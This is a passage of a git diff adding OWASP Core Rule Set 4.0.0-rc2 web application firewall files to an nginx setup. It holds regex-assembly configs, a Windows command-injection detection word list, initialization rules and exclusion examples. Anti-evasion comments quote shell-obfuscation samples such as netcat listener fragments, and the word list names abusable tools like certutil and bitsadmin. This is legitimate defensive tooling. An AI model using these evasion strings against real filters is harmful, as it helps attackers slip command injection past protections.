+##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! (cmd) + \( + ##! ,cmd + , + ##! @cmd + @ + ##! 'cmd' + ' + ##! "cmd" + \" + ##! spacing+cmd + \s +##!< +##!=> + +* +##!=> + +##! paths prefix +##!> assemble + ##! /path/cmd + [\w'\"\./]+/ + ##! C:\Program Files\cmd + [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c + ##! \\net\share\dir\cmd + [\^\.\w '\"/\x5c]*\x5c +##!< +##!=> + +?[\"\^]* +##!=> diff --git a/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra b/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra new file mode 100644 index 00000000..5e36d81b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/windows-commands.ra @@ -0,0 +1,299 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##! The list comes from the Microsoft Windows Server documentation. +##! You can get it using the following one-liner: +##! `curl https://raw.githubusercontent.com/MicrosoftDocs/windowsserverdocs/main/WindowsServerDocs/administration/windows-commands/windows-commands.md | grep -oE '^-\s\[\w+\]' | cut -f2 -d[ | cut -f1 -d]` + +active +add +append +arp +assign +assoc +at +atmadm +attrib +attributes +auditpol +autochk +autoconv +autofmt +automount +bcdboot +bcdedit +bdehdcfg +bitsadmin +bootcfg +break +cacls +call +cd +certreq +certutil +change +chcp +chdir +chglogon +chgport +chgusr +chkdsk +chkntfs +choice +cipher +clean +cleanmgr +clip +cls +cmd +cmdkey +cmstp +color +comp +compact +convert +copy +create +cscript +date +dcdiag +dcgpofix +defrag +del +delete +detail +dfsdiag +dfsrmig +diantz +dir +diskcomp +diskcopy +diskpart +diskperf +diskraid +diskshadow +dispdiag +dnscmd +doskey +driverquery +echo +edit +endlocal +erase +eventcreate +Evntcmd +exec +exit +expand +expose +extend +extract +fc +filesystems +find +findstr +finger +flattemp +fondue +for +forfiles +format +freedisk +fsutil +ftp +ftype +fveupdate +getmac +gettype +goto +gpfixup +gpresult +gpt +gpupdate +graftabl +help +helpctr +hostname +icacls +if +inactive +ipconfig +ipxroute +irftp +jetpack +klist +ksetup +ktmutil +ktpass +label +list +lodctr +logman +logoff +lpq +lpr +macfile +makecab +mapadmin +md +mkdir +mklink +mmc +mode +more +mount +mountvol +move +mqbkup +mqsvc +mqtgsvc +msdt +msg +msiexec +msinfo32 +mstsc +nbtstat +netcfg +netdom +netsh +netstat +nfsadmin +nfsshare +nfsstat +nlbmgr +nltest +nslookup +ntbackup +ntcmdprompt +ntfrsutl +offline +online +openfiles +pagefileconfig +path +pathping +pause +pbadmin +pentnt +perfmon +ping +pktmon +pnpunattend +pnputil +popd +powershell +print +prncnfg +prndrvr +prnjobs +prnmngr +prnport +prnqctl +prompt +pubprn +pushd +pushprinterconnections +pwlauncher +pwsh +qappsrv +qprocess +query +quser +qwinsta +rd +rdpsign +recover +refsutil +reg +regini +regsvr32 +relog +rem +remove +ren +rename +repadmin +repair +replace +rescan +reset +retain +revert +rexec +risetup +rmdir +robocopy +rpcinfo +rpcping +rsh +rundll32 +rwinsta +san +schtasks +scwcmd +secedit +select +serverceipoptin +servermanagercmd +serverweroptin +setx +sfc +shadow +shift +showmount +shrink +shutdown +sort +start +subst +sxstrace +sysocmgr +systeminfo +takeown +tapicfg +taskkill +tasklist +tcmsetup +telnet +tftp +time +timeout +title +tlntadmn +tpmtool +tpmvscmgr +tracerpt +tracert +tree +tscon +tsdiscon +tsecimp +tskill +tsprof +type +typeperf +tzutil +unexpose +uniqueid +unlodctr +ver +verifier +verify +vol +vssadmin +waitfor +wbadmin +wdsutil +wecutil +wevtutil +where +whoami +winnt +winnt32 +winrs +wmic +writer +wscript +xcopy diff --git a/nginx/config/owasp-crs/regex-assembly/toolchain.yaml b/nginx/config/owasp-crs/regex-assembly/toolchain.yaml new file mode 100644 index 00000000..d921b799 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/toolchain.yaml @@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # +# configuration file for crs-toolchain +# # # # # # # # # # # # # # # # # # # # +patterns: + # The Unix evasion patterns, were extended per decision in https://github.com/coreruleset/coreruleset/issues/2632. + anti_evasion: + # - [\x5c'\"\[)]: common evasion tokens and path expansion, e.g., `/bin/[c]''a""\t` + # - (?:\|\||&&)\s*: hiding of empty variables through logial operators, e.g., `nc&&$u -p 777` + # - \$[a-z0-9_@?!#{(*-]*: empty variable evasion, e.g., `n\$uc -p 777` + # - [\x5c'\"\[)], \$[a-z0-9_@?!#{(*-]*: arithmetic expansion evasion, e.g., `c$((9))9` + unix: | + [\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c? + windows: | + [\"\^]* + anti_evasion_suffix: + # - <>: redirection, e.g., `cat,&|)].* + # "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + windows: | + [\s,;./<>].* + # Same as above but does not allow any white space as the next token. + # This is useful for words like `python3`, where `python@` would + # create too many false positives because it would match `python `. + anti_evasion_no_space_suffix: + # This will match: + # + # python<<,&|]|(?:[\w\d._-][\x5c'\"\[]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{*-]*)?\x5c?)+[\s<>,&|]).* + # This will match: + # + # python,foo + # python2 foo + # + # It will _not_ match: + # python foo + windows: | + (?:[,;./<>]|(?:[\w\d._-][\"\^]*)+[\s,;./<>]).* diff --git a/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example new file mode 100644 index 00000000..e856911a --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -0,0 +1,200 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# The purpose of this file is to hold LOCAL exceptions for your site. The +# types of rules that would go into this file are one where you want to +# short-circuit inspection and allow certain transactions to pass through +# inspection or if you want to alter rules that are applied. +# +# This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a +# very specific reason. Files affixed with the .example extension are designed +# to contain user created/modified data. The '.example'. extension should be +# renamed to end in .conf. The advantage of this is that when OWASP CRS is +# updated, the updates will not overwrite a user generated configuration file. +# +# As a result of this design paradigm users are encouraged NOT to directly +# modify rules. Instead they should use this +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the +# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using +# methods similar to the examples specified below. +# +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and +# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity +# effectively maintains two different context: startup, and per transaction. +# As a rule, directives are processed within the startup context. While they +# can affect the per transaction context they generally remain fixed during the +# execution of ModSecurity. +# +# As a result if one wanted to disable a rule at bootup the SecRuleRemoveById +# directive or one of its siblings would have to be placed AFTER the rule is +# listed, otherwise it will not have knowledge of the rules existence (since +# these rules are read in at the same time). This means that when using +# directives that effect SecRules, these exceptions should be placed AFTER all +# the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is +# designed such that it loads LAST. +# +# Conversely, ModSecurity supports several actions that can change the state of +# the underlying configuration during the per transaction context, this is when +# rules are being processed. Generally, these are accomplished by using the +# 'ctl' action. As these are part of a rule, they will be evaluated in the +# order rules are applied (by physical location, considering phases). As a +# result of this ordering a 'ctl' action should be placed with consideration to +# when it will be executed. This is particularly relevant for the 'ctl' options +# that involve modifying ID's (such as ruleRemoveById). In these cases it is +# important that such rules are placed BEFORE the rule ID they will affect. +# Unlike the setup context, by the time we process rules in the per-transaction +# context, we are already aware of all the rule ID's. It is by this logic that +# we include rules such as this BEFORE all the remaining rules. As a result +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST. +# +# As a general rule: +# ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# +# SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# +# +# What follows are a group of examples that show you how to perform rule +# exclusions. +# +# +# Example Exclusion Rule: Disable inspection for an authorized client +# +# This ruleset allows you to control how ModSecurity will handle traffic +# originating from Authorized Vulnerability Scanning (AVS) sources. See +# related blog post - +# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-advanced-topic-of-the-week-handling-authorized-scanning-traffic/ +# +# Allow List ASV network block (no blocking or logging of AVS traffic) Update +# IP network block as appropriate for your AVS traffic +# +# ModSec Rule Exclusion: Disable Rule Engine for known ASV IP +# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \ +# "id:1000,\ +# phase:1,\ +# pass,\ +# nolog,\ +# ctl:ruleEngine=Off" +# +# +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for an individual rule +# +# This rule shows how to conditionally exclude the "password" +# parameter for rule 942100 when the REQUEST_URI is /index.php +# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection +# +# SecRule REQUEST_URI "@beginsWith /index.php" \ +# "id:1001,\ +# phase:1,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetById=942100;ARGS:password" +# +# +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for only certain attacks +# +# Attack rules within the CRS are tagged, with tags such as 'attack-lfi', +# 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera. +# +# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd +# for all rules tagged attack-sqli +# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ +# "id:1002,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd" +# + +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for all CRS rules +# +# This rule illustrates that we can use tagging very effectively to allow list a +# common false positive across an entire ModSecurity instance. This can be done +# because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT +# affect custom rules. +# +# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd +# for all CRS rules +# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ +# "id:1003,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" + +# +# Example Exclusion Rule: Removing a range of rules +# +# This rule illustrates that we can remove a rule range via a ctl action. +# This uses the fact, that rules are grouped by topic in rule files covering +# a certain id range. +# IMPORTANT: ModSecurity v3, aka libModSecurity, does not currently support the +# use of rule ranges in a ruleRemoveById ctl action (this feature has been +# planned for v3.1). Consider using ruleRemoveByTag as a workaround, if +# appropriate. +# +# ModSecurity Rule Exclusion: Disable all SQLi and XSS rules +# SecRule REQUEST_FILENAME "@beginsWith /admin" \ +# "id:1004,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveById=941000-942999" +# +# +# The application-specific rule exclusion plugins +# (see: https://github.com/coreruleset/plugin-registry) +# provide additional examples which can be useful then tuning a service. + + +# +# Example Rule: Allow monitoring tools and scripts +# +# Uncomment this rule to allow all requests from trusted IPs and User-Agent. +# This can be useful for monitoring tools like Monit, Nagios, or other agents. +# For example, if you're using AWS Load Balancer, you may need to trust all +# requests from "10.0.0.0/8" subnet that come with the user-agent +# "ELB-HealthChecker/2.0". By doing this, all requests that match these +# conditions will not be matched against the following rules: +# +# - id: 911100 (allowed methods) +# - id: 913100 (scan detection) +# - id: 920280 (missing/empty host header) +# - id: 920350 (IP address in host header) +# - tag: attack-disclosure (all RESPONSE-*-DATA-LEAKAGES rules) +# +# SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" \ +# "id:1005,\ +# phase:1,\ +# pass,\ +# nolog,\ +# chain" +# SecRule REQUEST_METHOD "@pm GET HEAD" "chain" +# SecRule REQUEST_HEADERS:User-Agent "@pm ELB-HealthChecker" \ +# "ctl:ruleRemoveById=911100,\ +# ctl:ruleRemoveById=913100,\ +# ctl:ruleRemoveById=920280,\ +# ctl:ruleRemoveById=920350,\ +# ctl:ruleRemoveByTag=attack-disclosure" diff --git a/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf b/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf new file mode 100644 index 00000000..498ad885 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf @@ -0,0 +1,427 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules +# and performs preparatory actions. It also fixes errors and omissions +# of variable definitions in the file crs-setup.conf. +# The crs-setup.conf can and should be edited by the user, this file +# is part of the CRS installation and should not be altered. +# + + +# +# -=[ Rules Version ]=- +# +# Rule version data is added to the "Producer" line of Section H of the Audit log: +# +# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0. +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature +# +SecComponentSignature "OWASP_CRS/4.0.0-rc2" + +# +# -=[ Default setup values ]=- +# +# The CRS checks the tx.crs_setup_version variable to ensure that the setup +# file is included at the correct time. This detects situations where +# necessary settings are not defined, for instance if the file +# inclusion order is incorrect, or if the user has forgotten to +# include the crs-setup.conf file. +# +# If you are upgrading from an earlier version of the CRS and you are +# getting this error, please make a new copy of the setup template +# crs-setup.conf.example to crs-setup.conf, and re-apply your policy +# changes. There have been many changes in settings syntax from CRS2 +# to CRS3, so an old setup file may cause unwanted behavior. +# +# If you are not planning to use the crs-setup.conf template, you must +# manually set the tx.crs_setup_version variable before including +# the CRS rules/* files. +# +# The variable is a numerical representation of the CRS version number. +# E.g., v3.0.0 is represented as 300. +# + +SecRule &TX:crs_setup_version "@eq 0" \ + "id:901001,\ + phase:1,\ + deny,\ + status:500,\ + log,\ + auditlog,\ + msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL'" + + +# +# -=[ Default setup values ]=- +# +# Some constructs or individual rules will fail if certain parameters +# are not set in the crs-setup.conf file. The following rules will catch +# these cases and assign sane default values. +# + +# Default Inbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) +SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ + "id:901100,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.inbound_anomaly_score_threshold=5'" + +# Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) +SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ + "id:901110,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.outbound_anomaly_score_threshold=4'" + +# Default Reporting Level (rule 900115 in crs-setup.conf) +SecRule &TX:reporting_level "@eq 0" \ + "id:901111,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.reporting_level=4'" + +# Default Early Blocking (rule 900120 in crs-setup.conf) +SecRule &TX:early_blocking "@eq 0" \ + "id:901115,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.early_blocking=0'" + +# Default Blocking Paranoia Level (rule 900000 in crs-setup.conf) +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.blocking_paranoia_level=1'" + +# Default Detection Paranoia Level (rule 900001 in crs-setup.conf) +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +# Default Sampling Percentage (rule 900400 in crs-setup.conf) +SecRule &TX:sampling_percentage "@eq 0" \ + "id:901130,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.sampling_percentage=100'" + +# Default Anomaly Scores (rule 900100 in crs-setup.conf) +SecRule &TX:critical_anomaly_score "@eq 0" \ + "id:901140,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.critical_anomaly_score=5'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule &TX:warning_anomaly_score "@eq 0" \ + "id:901142,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.warning_anomaly_score=3'" + +SecRule &TX:notice_anomaly_score "@eq 0" \ + "id:901143,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.notice_anomaly_score=2'" + +# Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf) +SecRule &TX:allowed_methods "@eq 0" \ + "id:901160,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf) +SecRule &TX:allowed_request_content_type "@eq 0" \ + "id:901162,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" + +# Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf) +SecRule &TX:allowed_request_content_type_charset "@eq 0" \ + "id:901168,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" + +# Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf) +SecRule &TX:allowed_http_versions "@eq 0" \ + "id:901163,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" + +# Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf) +SecRule &TX:restricted_extensions "@eq 0" \ + "id:901164,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf) +SecRule &TX:restricted_headers_basic "@eq 0" \ + "id:901165,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" + +# Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf) +SecRule &TX:restricted_headers_extended "@eq 0" \ + "id:901171,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.restricted_headers_extended=/accept-charset/'" + +# Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf) +SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ + "id:901167,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.enforce_bodyproc_urlencoded=0'" + +# Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf) +SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ + "id:901169,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.crs_validate_utf8_encoding=0'" + +# +# -=[ Initialize internal variables ]=- +# + +# Initialize anomaly scoring variables. +# All _score variables start at 0, and are incremented by the various rules +# upon detection of a possible attack. + +SecAction \ + "id:901200,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'tx.blocking_inbound_anomaly_score=0',\ + setvar:'tx.detection_inbound_anomaly_score=0',\ + setvar:'tx.inbound_anomaly_score_pl1=0',\ + setvar:'tx.inbound_anomaly_score_pl2=0',\ + setvar:'tx.inbound_anomaly_score_pl3=0',\ + setvar:'tx.inbound_anomaly_score_pl4=0',\ + setvar:'tx.sql_injection_score=0',\ + setvar:'tx.xss_score=0',\ + setvar:'tx.rfi_score=0',\ + setvar:'tx.lfi_score=0',\ + setvar:'tx.rce_score=0',\ + setvar:'tx.php_injection_score=0',\ + setvar:'tx.http_violation_score=0',\ + setvar:'tx.session_fixation_score=0',\ + setvar:'tx.blocking_outbound_anomaly_score=0',\ + setvar:'tx.detection_outbound_anomaly_score=0',\ + setvar:'tx.outbound_anomaly_score_pl1=0',\ + setvar:'tx.outbound_anomaly_score_pl2=0',\ + setvar:'tx.outbound_anomaly_score_pl3=0',\ + setvar:'tx.outbound_anomaly_score_pl4=0',\ + setvar:'tx.anomaly_score=0'" + + +# +# -=[ Initialize collections ]=- +# +# Create both Global and IP collections for rules to use. +# Some plugins assume that these two collections have already +# been initialized. +# IP collection is initialized with the IP address concatened with the hashed user agent. + +# Disable collection initialization by default (see rule 900130 in crs-setup.conf) +SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ + "id:901320,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ + "t:none,t:sha1,t:hexEncode,\ + initcol:global=global,\ + initcol:ip=%{remote_addr}_%{MATCHED_VAR}" + +# +# -=[ Initialize Correct Body Processing ]=- +# +# Force request body variable and optionally request body processor +# + +# Force body variable +SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ + "id:901340,\ + phase:1,\ + pass,\ + nolog,\ + noauditlog,\ + msg:'Enabling body inspection',\ + ctl:forceRequestBodyVariable=On,\ + ver:'OWASP_CRS/4.0.0-rc2'" + +# Force body processor URLENCODED +SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ + "id:901350,\ + phase:1,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + noauditlog,\ + msg:'Enabling forced body inspection for ASCII content',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + chain" + SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ + "ctl:requestBodyProcessor=URLENCODED" + + +# +# -=[ Easing In / Sampling Percentage ]=- +# +# This is used to send only a limited percentage of requests into the Core +# Rule Set. The selection is based on TX.sampling_percentage and a pseudo +# random number calculated below. +# +# Use this to ease into a new Core Rules installation with an existing +# productive service. +# +# See +# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/ +# + +# +# Generate the pseudo random number +# +# ATTENTION: This is no cryptographically secure random number. It's just +# a cheap way to get some random number suitable for sampling. +# +# We take the entropy contained in the UNIQUE_ID. We hash that variable and +# take the first integer numbers out of it. Theoretically, it is possible +# but highly improbable that there are no integers in a hexEncoded sha1 hash. +# In the very rare event that two integers are not matched (due to only being +# a-f in all, or all but one positions) 901450 will not be triggered. +# Leading zeros are not removed from the two-digit random number, and are +# handled gracefullly by 901450 + +SecRule TX:sampling_percentage "@eq 100" \ + "id:901400,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + skipAfter:END-SAMPLING" + +SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ + "id:901410,\ + phase:1,\ + pass,\ + capture,\ + t:sha1,t:hexEncode,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" + +# +# Sampling decision +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# being written. If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCEPTIONS.conf). +# +# SecRuleUpdateActionById 901450 "nolog" +# + + +SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ + "id:901450,\ + phase:1,\ + pass,\ + log,\ + noauditlog,\ + msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ + ctl:ruleRemoveByTag=OWASP_CRS,\ + ver:'OWASP_CRS/4.0.0-rc2'" + +SecMarker "END-SAMPLING" + + +# +# Configuration Plausibility Checks +# + +# Make sure detection paranoia level is not lower than paranoia level +SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ + "id:901500,\ + phase:1,\ + deny,\ + status:500,\ + t:none,\ + log,\ + msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ + ver:'OWASP_CRS/4.0.0-rc2'" diff --git a/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf new file mode 100644 index 00000000..5af67b03 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -0,0 +1,55 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + + +# This file is used as an exception mechanism to remove common false positives +# that may be encountered. +# +# Exception for Apache SSL pinger +# +SecRule REQUEST_LINE "@streq GET /" \ + "id:905100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-generic',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + chain" + SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ + "t:none,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ + ctl:auditEngine=Off" + +# +# Exception for Apache internal dummy connection +# +SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ + "id:905110,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-generic',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ + "t:none,\ + 